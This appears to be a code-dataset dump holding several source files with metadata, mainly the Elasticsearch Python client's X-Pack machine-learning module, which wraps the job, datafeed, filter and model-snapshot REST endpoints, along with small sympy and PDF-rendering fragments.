parser.add_argument("color", choices=["gray", "color"], help="kind of images to render")
args = parser.parse_args()
dataset = datasets.get_dataset(args.dataset)
print("Running on dataset: " + dataset.name)
if args.color == "gray":
get_images(dataset.pdf_dir, dataset.page_images_gray_dir,
dataset.IMAGE_DPI, True)
elif args.color == "color":
get_images(dataset.pdf_dir, dataset.page_images_color_dir,
dataset.COLOR_IMAGE_DPI, False)
else:
exit(1)
| en | 0.812211 | Script to use pdftoppm to turn the pdfs into single images per page | 3.040675 | 3 |
sympy/physics/__init__.py | utkarshdeorah/sympy | 1 | 9128 | <reponame>utkarshdeorah/sympy
"""
A module that helps solving problems in physics.
"""
from . import units
from .matrices import mgamma, msigma, minkowski_tensor, mdft
__all__ = [
'units',
'mgamma', 'msigma', 'minkowski_tensor', 'mdft',
]
| """
A module that helps solving problems in physics.
"""
from . import units
from .matrices import mgamma, msigma, minkowski_tensor, mdft
__all__ = [
'units',
'mgamma', 'msigma', 'minkowski_tensor', 'mdft',
] | en | 0.925716 | A module that helps solving problems in physics. | 2.023381 | 2 |
py.py | avr8082/Hadoop | 0 | 9129 | printf("Hello world")
| printf("Hello world")
| none | 1 | 1.240308 | 1 |
|
build/python-env/lib/python2.7/site-packages/elasticsearch/client/xpack/ml.py | imiMoisesEducation/beatcookie-discbot | 1 | 9130 | from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH
class MlClient(NamespacedClient):
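    """
    Namespaced client exposing the X-Pack machine learning APIs (all request
    paths live under ``/_xpack/ml``).
    Example (illustrative sketch only -- the job id and configuration shown are
    assumptions, not part of this module)::
        from elasticsearch import Elasticsearch
        es = Elasticsearch()
        es.xpack.ml.put_job(job_id="my-job", body={
            "analysis_config": {
                "bucket_span": "5m",
                "detectors": [{"function": "count"}],
            },
            "data_description": {"time_field": "timestamp"},
        })
        es.xpack.ml.open_job(job_id="my-job")
    """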
@query_params('from_', 'size')
def get_filters(self, filter_id=None, params=None):
"""
:arg filter_id: The ID of the filter to fetch
:arg from_: skips a number of filters
:arg size: specifies a max number of filters to get
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'filters', filter_id), params=params)
@query_params()
def get_datafeeds(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed.html>`_
:arg datafeed_id: The ID of the datafeeds to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params)
@query_params()
def get_datafeed_stats(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed-stats.html>`_
:arg datafeed_id: The ID of the datafeeds stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stats'), params=params)
@query_params('anomaly_score', 'desc', 'end', 'exclude_interim', 'expand',
'from_', 'size', 'sort', 'start')
def get_buckets(self, job_id, timestamp=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-bucket.html>`_
:arg job_id: ID of the job to get bucket results from
:arg timestamp: The timestamp of the desired single bucket result
:arg body: Bucket selection details if not provided in URI
:arg anomaly_score: Filter for the most anomalous buckets
:arg desc: Set the sort direction
:arg end: End time filter for buckets
:arg exclude_interim: Exclude interim results
:arg expand: Include anomaly records
:arg from_: skips a number of buckets
:arg size: specifies a max number of buckets to get
:arg sort: Sort buckets by a particular field
:arg start: Start time filter for buckets
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'buckets', timestamp),
params=params, body=body)
@query_params('reset_end', 'reset_start')
def post_data(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-data.html>`_
:arg job_id: The name of the job receiving the data
:arg body: The data to process
:arg reset_end: Optional parameter to specify the end of the bucket
resetting range
:arg reset_start: Optional parameter to specify the start of the bucket
resetting range
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_data'), params=params,
body=self._bulk_body(body))
@query_params('force', 'timeout')
def stop_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-stop-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to stop
:arg force: True if the datafeed should be forcefully stopped.
:arg timeout: Controls the time to wait until a datafeed has stopped.
Default to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stop'), params=params)
@query_params()
def get_jobs(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job.html>`_
:arg job_id: The ID of the jobs to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params)
@query_params()
def delete_expired_data(self, params=None):
"""
"""
return self.transport.perform_request('DELETE',
'/_xpack/ml/_delete_expired_data', params=params)
@query_params()
def put_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params, body=body)
@query_params()
def validate_detector(self, body, params=None):
"""
:arg body: The detector
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate/detector', params=params,
body=body)
@query_params('end', 'start', 'timeout')
def start_datafeed(self, datafeed_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-start-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to start
:arg body: The start datafeed parameters
:arg end: The end time when the datafeed should stop. When not set, the
datafeed continues in real time
:arg start: The start time from where the datafeed should begin
:arg timeout: Controls the time to wait until a datafeed has started.
Default to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_start'), params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'record_score',
'size', 'sort', 'start')
def get_records(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-record.html>`_
        :arg job_id: The ID of the job to fetch record results from
:arg body: Record selection criteria
:arg desc: Set the sort direction
:arg end: End time filter for records
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of records
        :arg record_score: Returns records with anomaly scores greater or equal than this value
:arg size: specifies a max number of records to get
:arg sort: Sort records by a particular field
:arg start: Start time filter for records
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'records'), params=params,
body=body)
@query_params()
def update_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job update settings
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_update'), params=params, body=body)
@query_params()
def put_filter(self, filter_id, body, params=None):
"""
:arg filter_id: The ID of the filter to create
:arg body: The filter details
"""
for param in (filter_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'filters', filter_id), params=params, body=body)
@query_params()
def update_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to update
:arg body: The datafeed update settings
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_update'), params=params, body=body)
@query_params()
def preview_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-preview-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to preview
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_preview'), params=params)
@query_params('advance_time', 'calc_interim', 'end', 'skip_time', 'start')
def flush_job(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-flush-job.html>`_
:arg job_id: The name of the job to flush
:arg body: Flush parameters
:arg advance_time: Advances time to the given value generating results
and updating the model for the advanced interval
:arg calc_interim: Calculates interim results for the most recent bucket
or all buckets within the latency period
:arg end: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
:arg skip_time: Skips time to the given value without generating results
or updating the model for the skipped interval
:arg start: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_flush'), params=params, body=body)
@query_params('force', 'timeout')
def close_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-close-job.html>`_
:arg job_id: The name of the job to close
:arg force: True if the job should be forcefully closed
:arg timeout: Controls the time to wait until a job has closed. Default
to 30 minutes
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_close'), params=params)
@query_params()
def open_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-open-job.html>`_
:arg job_id: The ID of the job to open
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_open'), params=params)
@query_params('force')
def delete_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-job.html>`_
:arg job_id: The ID of the job to delete
:arg force: True if the job should be forcefully deleted
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id), params=params)
@query_params()
def update_model_snapshot(self, job_id, snapshot_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to update
:arg body: The model snapshot properties to update
"""
for param in (job_id, snapshot_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_update'), params=params, body=body)
@query_params()
def delete_filter(self, filter_id, params=None):
"""
:arg filter_id: The ID of the filter to delete
"""
if filter_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'filter_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'filters', filter_id), params=params)
@query_params()
def validate(self, body, params=None):
"""
:arg body: The job config
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate', params=params, body=body)
@query_params('from_', 'size')
def get_categories(self, job_id, category_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-category.html>`_
:arg job_id: The name of the job
:arg category_id: The identifier of the category definition of interest
:arg body: Category selection details if not provided in URI
:arg from_: skips a number of categories
:arg size: specifies a max number of categories to get
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'categories', category_id),
params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'influencer_score',
'size', 'sort', 'start')
def get_influencers(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-influencer.html>`_
:arg job_id: None
:arg body: Influencer selection criteria
        :arg desc: whether the results should be sorted in descending order
:arg end: end timestamp for the requested influencers
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of influencers
:arg influencer_score: influencer score threshold for the requested
influencers
:arg size: specifies a max number of influencers to get
:arg sort: sort field for the requested influencers
:arg start: start timestamp for the requested influencers
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'influencers'),
params=params, body=body)
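    # Sketch only (job name and threshold are made up): the query parameters
    # declared above can be passed as keyword arguments, so the top influencers
    # above a score threshold could be fetched like this.
    #
    #     resp = ml.get_influencers("my-anomaly-job", influencer_score=75,
    #                               sort="influencer_score", desc=True, size=10)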
@query_params()
def put_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to create
:arg body: The datafeed config
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params, body=body)
@query_params('force')
def delete_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to delete
:arg force: True if the datafeed should be forcefully deleted
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'datafeeds', datafeed_id), params=params)
@query_params()
def get_job_stats(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-stats.html>`_
:arg job_id: The ID of the jobs stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_stats'), params=params)
@query_params('delete_intervening_results')
def revert_model_snapshot(self, job_id, snapshot_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-revert-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to revert to
:arg body: Reversion options
:arg delete_intervening_results: Should we reset the results back to the
time of the snapshot?
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_revert'), params=params, body=body)
@query_params('desc', 'end', 'from_', 'size', 'sort', 'start')
def get_model_snapshots(self, job_id, snapshot_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to fetch
:arg body: Model snapshot selection criteria
:arg desc: True if the results should be sorted in descending order
:arg end: The filter 'end' query parameter
:arg from_: Skips a number of documents
:arg size: The default number of documents returned in queries as a
string.
:arg sort: Name of the field to sort on
:arg start: The filter 'start' query parameter
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params, body=body)
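    # Hedged example (identifiers and the sort field are illustrative): the most
    # recent snapshots for a job could be listed in descending order of timestamp.
    #
    #     snapshots = ml.get_model_snapshots("my-anomaly-job", sort="timestamp",
    #                                        desc=True, size=5)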
@query_params()
def delete_model_snapshot(self, job_id, snapshot_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to delete
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params)
| from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH
class MlClient(NamespacedClient):
@query_params('from_', 'size')
def get_filters(self, filter_id=None, params=None):
"""
:arg filter_id: The ID of the filter to fetch
:arg from_: skips a number of filters
:arg size: specifies a max number of filters to get
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'filters', filter_id), params=params)
@query_params()
def get_datafeeds(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed.html>`_
:arg datafeed_id: The ID of the datafeeds to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params)
@query_params()
def get_datafeed_stats(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed-stats.html>`_
:arg datafeed_id: The ID of the datafeeds stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stats'), params=params)
@query_params('anomaly_score', 'desc', 'end', 'exclude_interim', 'expand',
'from_', 'size', 'sort', 'start')
def get_buckets(self, job_id, timestamp=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-bucket.html>`_
:arg job_id: ID of the job to get bucket results from
:arg timestamp: The timestamp of the desired single bucket result
:arg body: Bucket selection details if not provided in URI
:arg anomaly_score: Filter for the most anomalous buckets
:arg desc: Set the sort direction
:arg end: End time filter for buckets
:arg exclude_interim: Exclude interim results
:arg expand: Include anomaly records
:arg from_: skips a number of buckets
:arg size: specifies a max number of buckets to get
:arg sort: Sort buckets by a particular field
:arg start: Start time filter for buckets
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'buckets', timestamp),
params=params, body=body)
@query_params('reset_end', 'reset_start')
def post_data(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-data.html>`_
:arg job_id: The name of the job receiving the data
:arg body: The data to process
:arg reset_end: Optional parameter to specify the end of the bucket
resetting range
:arg reset_start: Optional parameter to specify the start of the bucket
resetting range
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_data'), params=params,
body=self._bulk_body(body))
@query_params('force', 'timeout')
def stop_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-stop-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to stop
:arg force: True if the datafeed should be forcefully stopped.
:arg timeout: Controls the time to wait until a datafeed has stopped.
            Defaults to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stop'), params=params)
@query_params()
def get_jobs(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job.html>`_
:arg job_id: The ID of the jobs to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params)
@query_params()
def delete_expired_data(self, params=None):
"""
"""
return self.transport.perform_request('DELETE',
'/_xpack/ml/_delete_expired_data', params=params)
@query_params()
def put_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params, body=body)
@query_params()
def validate_detector(self, body, params=None):
"""
:arg body: The detector
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate/detector', params=params,
body=body)
@query_params('end', 'start', 'timeout')
def start_datafeed(self, datafeed_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-start-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to start
:arg body: The start datafeed parameters
:arg end: The end time when the datafeed should stop. When not set, the
datafeed continues in real time
:arg start: The start time from where the datafeed should begin
:arg timeout: Controls the time to wait until a datafeed has started.
            Defaults to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_start'), params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'record_score',
'size', 'sort', 'start')
def get_records(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-record.html>`_
:arg job_id: None
:arg body: Record selection criteria
:arg desc: Set the sort direction
:arg end: End time filter for records
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of records
:arg record_score:
:arg size: specifies a max number of records to get
:arg sort: Sort records by a particular field
:arg start: Start time filter for records
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'records'), params=params,
body=body)
@query_params()
def update_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job update settings
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_update'), params=params, body=body)
@query_params()
def put_filter(self, filter_id, body, params=None):
"""
:arg filter_id: The ID of the filter to create
:arg body: The filter details
"""
for param in (filter_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'filters', filter_id), params=params, body=body)
@query_params()
def update_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to update
:arg body: The datafeed update settings
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_update'), params=params, body=body)
@query_params()
def preview_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-preview-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to preview
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_preview'), params=params)
@query_params('advance_time', 'calc_interim', 'end', 'skip_time', 'start')
def flush_job(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-flush-job.html>`_
:arg job_id: The name of the job to flush
:arg body: Flush parameters
:arg advance_time: Advances time to the given value generating results
and updating the model for the advanced interval
:arg calc_interim: Calculates interim results for the most recent bucket
or all buckets within the latency period
:arg end: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
:arg skip_time: Skips time to the given value without generating results
or updating the model for the skipped interval
:arg start: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_flush'), params=params, body=body)
@query_params('force', 'timeout')
def close_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-close-job.html>`_
:arg job_id: The name of the job to close
:arg force: True if the job should be forcefully closed
        :arg timeout: Controls the time to wait until a job has closed. Defaults
to 30 minutes
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_close'), params=params)
@query_params()
def open_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-open-job.html>`_
:arg job_id: The ID of the job to open
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_open'), params=params)
@query_params('force')
def delete_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-job.html>`_
:arg job_id: The ID of the job to delete
:arg force: True if the job should be forcefully deleted
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id), params=params)
@query_params()
def update_model_snapshot(self, job_id, snapshot_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to update
:arg body: The model snapshot properties to update
"""
for param in (job_id, snapshot_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_update'), params=params, body=body)
@query_params()
def delete_filter(self, filter_id, params=None):
"""
:arg filter_id: The ID of the filter to delete
"""
if filter_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'filter_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'filters', filter_id), params=params)
@query_params()
def validate(self, body, params=None):
"""
:arg body: The job config
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate', params=params, body=body)
@query_params('from_', 'size')
def get_categories(self, job_id, category_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-category.html>`_
:arg job_id: The name of the job
:arg category_id: The identifier of the category definition of interest
:arg body: Category selection details if not provided in URI
:arg from_: skips a number of categories
:arg size: specifies a max number of categories to get
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'categories', category_id),
params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'influencer_score',
'size', 'sort', 'start')
def get_influencers(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-influencer.html>`_
:arg job_id: None
:arg body: Influencer selection criteria
        :arg desc: whether the results should be sorted in descending order
:arg end: end timestamp for the requested influencers
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of influencers
:arg influencer_score: influencer score threshold for the requested
influencers
:arg size: specifies a max number of influencers to get
:arg sort: sort field for the requested influencers
:arg start: start timestamp for the requested influencers
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'influencers'),
params=params, body=body)
@query_params()
def put_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to create
:arg body: The datafeed config
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params, body=body)
@query_params('force')
def delete_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to delete
:arg force: True if the datafeed should be forcefully deleted
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'datafeeds', datafeed_id), params=params)
@query_params()
def get_job_stats(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-stats.html>`_
:arg job_id: The ID of the jobs stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_stats'), params=params)
@query_params('delete_intervening_results')
